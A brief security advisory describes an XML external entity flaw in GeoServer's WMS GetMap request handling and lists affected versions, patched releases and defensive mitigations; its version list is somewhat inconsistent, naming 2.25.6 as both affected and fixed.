GeoServer is an open-source geospatial data server that allows users to share and edit geospatial data. The vulnerability exists due to insufficient XML input sanitization in the WMS GetMap operation, allowing attackers to define external entities within the XML request.
You're affected if you use GeoServer. Affected versions: 2.25.6, 2.26.2 If you don't recognise this software, you're probably not affected.
Update to GeoServer 2.25.6, 2.26.3, or 2.27.0.
* Maven: maven org.geoserver:gs-web-app >= 2.25.6 (or update the dependency version)
* Docker: docker run -it --rm osgeo/geoserver:2.25.6
- Immediate mitigations:
+ Restrict network access to your GeoServer instance (firewall it from the public internet)
+ Audit admin account activity for suspicious access patterns
+ Monitor for unauthorized token creation